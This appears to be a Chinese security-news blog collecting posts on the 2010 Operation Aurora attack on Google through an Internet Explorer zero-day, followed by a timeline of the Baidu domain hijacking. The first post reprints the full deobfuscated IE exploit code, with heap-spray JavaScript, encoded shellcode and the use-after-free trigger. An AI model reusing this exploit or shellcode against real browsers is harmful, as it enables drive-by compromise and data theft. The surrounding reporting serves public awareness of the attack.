BigSea'Blog

» 阅读全文

阅读全文

TechWeb旗下的DarkReading发表文章，透露iDefense已经收回之前发布的Adobe PDF漏洞导致google被攻击的声明，承认McAfee所说的ie漏洞才是祸源。

文章还给出了一个链接，指向开源渗透测试工具项目Metasploit的博客，上面给出了利用这个IE漏洞的攻击代码链接。代码如下：

【去混淆后的代码】

Evals

• var n = unescape("%u0c0d%u0c0d");
  while (n.length = 524288)n += n;
  n = n.substring(0, 524269 - sc.length);
  var x = new Array();
  for (var i = 0; i  200; i ++ ){
    x[i] = n + sc;
  }
  

  (repeated 1 time)

Writes

htmlscriptvar sc = unescape("  
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805  
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2  
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053  
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8  
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8  
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2  
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f  
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7  
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727  
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6  
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923  
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2  
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8  
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8  
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820  
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8  
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854  
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84  
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4  
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153  
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30  
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e  
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b  
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb  
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c  
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498  
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0  
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc  
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8  
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038  
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e  
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727  
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703  
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653  
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5  
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb  
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be  
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7  
%ubcb9%ub2f6%ubfa8%u00d8");  
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,   
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,   
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,   
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,   
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,   
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,   
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,   
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,   
735, 651, 427, 770, 301, 805, 693, 413, 875);  
var arr = new Array;  
for (var i = 0; i  sss.length; i ++ ){  
  arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cccc=cc.replace(/ ,/ g, ""  
  );  
  cccc = cc.replace(/@/g, ",");  
  eval(cc);  
  var x1 = new Array();  
  for (i = 0; i  200; i ++ ){  
    x1[i] = document.createElement("COMMENT");  
    x1[i].data = "abc";  
  }  
  ;  
  var e1 = null;  
  function ev1(evt){  
    e1 = document.createEventObject(evt);  
    document.getElementById("sp1").innerHTML = "";  
    window.setInterval(ev2, 50);  
  }  
  function ev2(){  
    p = "  
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d  
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d  
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";  
    for (i = 0; i  x1.length; i ++ ){  
      x1[i].data = p;  
    }  
    ;  
    var t = e1.srcElement;  
  }  
/scriptspan id="sp1"IMG SRC="aaa.gif" onload="ev1(event)"/span/body/html  

(repeated 1 time)

微软也发布了对这个漏洞的更新分析，表明Windows XP上的IE 6最为危险。值得一提的是，文章特别感谢了CSDN专家博客暨《程序员》杂志专栏作者、微软中国的褚诚云。我们会尽快邀请褚诚云写出更深入的分析文章。

还有专家用视频演示了攻击过程。

此前，《连线》杂志文章给出了大量攻击细节。

文章引述McAfee公司的话，说（攻击Google的）黑客使用了前所未有的战术，组合了加密、隐秘编程技术和IE中的未知漏洞，意图是窃取Google、Adobe和许多其他大公司的源代码。

该公司威胁研究副总裁Dmitri Alperovitch说：在国防工业之外，我们从未见过商业行业的公司遭受过如此复杂程度的攻击。

Alperovitch说，攻击者使用了十几种恶意代码和多层次的加密，深深地挖掘进了公司网络内部，并巧妙掩盖自己的活动。在掩饰攻击和防范常规侦测方法上，他们的加密非常成功。我们从未见过这种水平的加密。非常高超。

McAfee之所以将这种攻击命名为Auroro（极光），是因为他们发现，黑客在将恶意代码编译为可执行文件时，编译器将攻击者机器上的路径名插入代码中。

在IE漏洞被曝光后，微软很快发布了针对性的安全建议书。而McAfee也在其产品中增加了侦测这种攻击所用恶意代码的功能。

虽然最初的攻击始自公司雇员访问恶意网站，但是研究人员还在试图确定网站的URL是通过邮件、聊天程序还是其他方式，比如Facebook或者其他社会化网站。

当用户访问恶意网站的时候，他们的IE浏览器将被袭击，自动而且秘密地下载一系列恶意代码到计算机中。这些代码就像俄罗斯套娃那样，一个跟着一个地下载到系统中。

Alperovitch表示，最初的攻击代码是经过三次加密的shell code，用来激活漏洞挖掘程序。然后它执行从外部机器下载的程序，后者也是加密的，而且会从被攻击机器上删除第一个程序。这些加密的二进制文件将自己打包为几个也被加密的可执行文件。

其中一个恶意程序会打开一个远程后门，建立一个加密的秘密通道，伪装为一个SSL链接以避免被侦测到。这样攻击者就可以对被攻击机器进行访问，将它作为滩头阵地，继续进攻网络上的其他部分，搜索登录凭据、知识产权和其他要找的东西。

McAfee因参与攻击调查，从被攻击公司那里得到了攻击所用的一些恶意代码副本，并在几天前加强了自己的产品。

对于另一家安全企业iDefense之前所说的有些攻击使用了Trojan.Hydraq木马，Alperovitch表示，他发现的恶意代码此前任何反病毒厂商都不知道。

iDefense还说攻击者使用了恶意PDF附件和Adobe PDF程序的漏洞，而Alperovitch说，他调查的公司里没有发现这种情况。但他表示攻击不同公司的方法可能不同，不限于IE漏洞。

当黑客进入系统后，他们将数据发送给位于美国伊利诺依州和得克萨斯州以及中国台湾的指挥控制服务器。Alperovitch所没有识别到美国的系统牵涉到这次攻击，也没有提到攻击者的战果。但Rackspace报告他们无意中在攻击中发挥了少量作用。而iDefense则表示攻击者的目标是许多公司的源码库，而且很多情况下都成功得手。

Alperovitch说攻击看上去是从12月15日开始的，但也有可能更早。似乎结束于1月4日，那一天，用来与恶意代码传输数据的指挥控制服务器被关闭。

他说：我们不知道服务器是由攻击者关闭的，还是其他组织关闭的。但是从那时起，攻击停止了。

Aperovitch还指出，攻击的时机非常好，是在假日期间，公司的运营中心和安全响应团队人手很少。攻击的复杂程度令人印象深刻，是那种此前仅针对国防工业的攻击类型。一般对于商业部门，攻击只是为了获取财务方面的信息，通常是通过SQL注入攻击公司的网站，或者攻击公司不安全的无线网络。网络罪犯一般不会花大量的时间把攻击精雕细刻到如此程度，每个方面都采取混淆/加密防范。

McAfee还掌握了更多攻击细节，但目前不准备公布。他们已经与美国执法部门合作，并将这一问题告知美国各级政府。

阅读全文

Google recently announced that its China based location was the victim of an attack that targeted and compromised a critical internal system used to track the email accounts of those on China’s watch list. The system was designed to comply with government warrants for information concerning Chinese human rights activists. Some suspect China of targeting this specific system to circumvent the official warrant process in order to collect data on other Chinese citizens [1].

http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2010/01/15/china-google-and-web-security.aspx

阅读全文

据McAfee周五表示，导致谷歌电子邮件系统被大陆神秘黑客攻破的IE浏览器0-day漏洞最近已经被泄露到了网上.与此同时,德国联邦安全局也与同日发布了一则声明,提醒德国人民在IE推出安全补丁前暂时不要使用这款浏览器.

据McAfee的CTO George Kurtz在自己博客上的发帖显示:他们的研究人员在邮件列表中发现了有关的攻击代码,并确认称目前至少有一个网站已经公布了有关的漏洞攻击代码.他并表示:"McAfee本周早些时候便已经发现了这样的攻击代码,并已经将这些代码提交给了微软.不过这次泄露出来的攻击代码和我们提交的内容竟然完全一样."

"这些代码被公布于众之后,类似的针对IE的攻击会很快在网上流传开来."Kurtz写道:"不法分子可以利用这条公开的代码来攻击Windows操作系统。而且不少流行的渗透测试工具中也已经加入了测试这个漏洞的功能。"

本周四微软就该漏洞发布了警告信息，并称他们正在修补这个漏洞。根据微软的警告,该漏洞可影响包括Windows7在内的各款流行Windows操作系统中的IE6/7/8程序.他们还宣称使用IE6的用户将是漏洞攻击者的首要攻击对象.

谷歌本周二曾对外宣布称发现有大陆黑客正利用这种漏洞对自己和其它几家美国公司发起攻击,另外谷歌同时还表示攻击的目标还包括多位私人用户的Gmail邮箱.

据谷歌表示,去年12月份中期他们便发现有此类攻击行为出现,尽管谷歌并没有明确指出这种攻击是否是在指使下进行的.但他们随后表示,由于遭受了这种肆意攻击,因此他们准备退出中国市场.据熟知此事件内情的人士表示,这次针对谷歌的攻击所使用的攻击代码,与不久前针对几家美国公司所发起的攻击非常类似。

据透露，在这次攻击谷歌的事件中，有超过30家的美国硅谷企业开发的专利源代码被窃。Adobe公司已经确认称自己也是受害者之一，另据透露雅虎，赛门铁克，Juniper，诺斯罗普格鲁曼（Northrop Grumman）以及陶氏化学公司（Dow Chemical）也是这次攻击的受害者。

McAfee表示，在分析了这些ie漏洞攻击代码之后，他们发现攻击者将这次攻击行动命名为“曙光行动”（Aurora），同时这次攻击所使用的手法可谓相当高明。

CNBeta编译
原文：cnet
 

shuguang.jpg(缩略图)

阅读全文

今天早上7时许，百度出现访问中断的情况，查询域名baidu.com的WHOIS信息后发现百度域名出现不可解析的问题。最新消息是全国正在陆续恢复访问，百度也给出官方声明称问题出在国外域名服务商。
感谢网友为我们提供的新闻线索。

--------------------------------------------------------------------------------
16：00 百度的域名已经基本恢复正常访问。
13：35 目前普遍反映，百度的空间、贴吧等服务仍不能通过*.baidu.com访问。
13：30 午间报道集锦：百度无法访问的简单分析；从Baidu.com域名被修改看百度公司域名步署；[分析]百度对域名故障的应对措施；百度上不去怎么办 - 修改host。
12：51 李彦宏在百度i贴吧上发言，连称“史无前例，史无前例呀！
11：50 可以通过http://www.cyberarmyofiran.com/访问刚才baidu.com被重定向到的页面。
11：35 百度被攻击的历史回顾：2006年9月12日下午，百度发生大规模访问故障。晚上11时37分，百度在其百度空间发表声明，称遭受有史以来最大规模的不明身份黑客攻击。
11：30 百度旗下的hao123已经把“百度”的链接改为了百度的ip地址 http://119.75.213.61/ 。另外百度自己也收录了有关“百度被黑”的消息。
11：25 有部分网友遇到了重定向错误，另一部分网友回报恢复正常，还有网友表示被电信114劫持，恕不一一列出。现在说明自己所在地恢复的投递越来越多，表明情况正在好转。
11：20 有网友截取到了疑似硬件防火墙开启的图片，未经确认。
11：15 baidu.com的whois信息刚刚被改为正常。
11：08 百度官方消息称问题出在国外域名服务商。
11：00 根据我们对DNS记录的跟踪，尽管百度官方宣称问题已解决，但实际上百度和黑客的拉锯战依然在进行中，NS记录一改再改。
10：55 山寨台湾百度被确认为假新闻。
10：40 谷歌、搜搜、中国雅虎等搜索网站流量都出现不同程度的增幅。谷歌向腾讯科技表示，首页访问量出现了高达30%以上的巨大增幅。一位名为“燕南飞”的网友表示，他已经抢注了“百度被黑”的域名（baidubeihei.com）。
10：35 北京、山西、河南、福建、广东等地的部分网络恢复对baidu.com的访问。请网友继续回报本地的访问情况。详情请看内文。
09：55 拉锯战仍在继续，谷歌热榜上升最快关键字第一名也是“baidu”。国内大多数媒体都已经有了百度域名被劫持的报道。
09：40 baidu.com的NS纪录再次被修改为hostgator.com，又改回来。杯具继续发生，拉锯战进行中，NS数据被百度和黑客相继改来改去。
09：35 月光博客发表文章《百度被伊朗黑客攻陷》，谈了他自己的看法。
09：28 疑似yahoo将要放弃目前对baidu.com的解析。
09：20 百度已?迅速登上Alexa??排行榜首位。
09：15 图片上那个IP解析出来是pink2.warez-host.com，主页目前已经被拖垮，网页快照显示其数据中心在伊朗、荷兰与德国，提 供“离岸主机托管服务”。
09：10 被转向的伊朗页面显示“This account is suspended”。更新一系列图片。
08：36 有网友提供了被黑图像，上面的文字说明是“Iranian Cyber Army”，网页提供的信息这样写到：???? ?????? ????? ?? ?????? ?? ????? ??? ??????? ?????? ? ????????? ?? ???? ????? ??????? ? ??? ????? ???? ? ?????
??????? ??? ?????? ??? ??
08：30 百度DNS数据已经被改回，但WHOIS数据依然没有刷新。
08：20 有网友曾经被定向到一个黑页“Iranian Cyber Army”上，域名被盗取或劫持的可能性相当大，不过百度如此大的请求数量是任何一个黑页服务器也无法抵御的，因此只能是访问失败。回想起twitter 上次域名被转向，和这次攻击有着惊人的相似。

百度最新公告：向网友致歉 强烈谴责黑客攻击

1月12日晚间消息，百度方面再度发布最新公告，对今晨百度访问故障事件进行了详细说明。
百度表示，首先对无法正常访问给网友带来的不便表示歉意，同时要强烈谴责一切那些为了一己私利而恶意篡改、攻击网站的行为。百度同时还宣布，百度流量指标也已经恢复正常。

以下为全文：

百度关于用户12日上午不能正常访问首页的声明

2009年1月12日，因www.baidu.com的域名在美国域名注册商处被非法篡改，导致全球多处用户不能正常访问百度。事情发生后，我们立即采取措施，一方面通过www.baidu.com.cn

备用域名继续为网民提供搜索服务，一方面也与美国域名注册商协调，截止目前为止已经解决大部分用户使用www.baidu.com登录百度的问题。

作为一家以技术创新为立身之本的公司，百度一直以能为用户提供强大可靠的搜索服务而自豪。本次事件中，不法分子并没有攻击百度的服务器，而是选取美国域名注册商为攻击对象，这是一个新的现象，值得我们警惕。在此，我们呼吁DNS厂商加强网络安全方面的建设，百度也愿意积极配合，帮助更多DNS解决安全技术方面的问题。

我们首先对无法正常访问给网友带来的不便表示歉意，同时要强烈谴责一切那些为了一己私利而恶意篡改、攻击网站的行为。这种行为如果不能在道德和法律的层面加以制止，今天受损的可能是百度，明天受损的可能是其他任何一家合法网站，而归根到底是全体网民利益受到损害。我们看到部分中国网友基于义愤，也报复性攻击其他外国网站，在心底对你们表示感谢的同时，我们并不鼓励这样的做法，请大家保持冷静。

本次事情已经告一段落，百度的流量指标也已经恢复正常。我们再次感谢网友对百度的理解和支持，希望在未来继续为大家提供最为优质的搜索服务。
 

Ps:又见dns劫持攻击！还记得年初DZ论坛的域名劫持攻击事件吗？还有twitter域名转向事件！域名安全和dns安全的危害性远远大于服务器安全！

阅读全文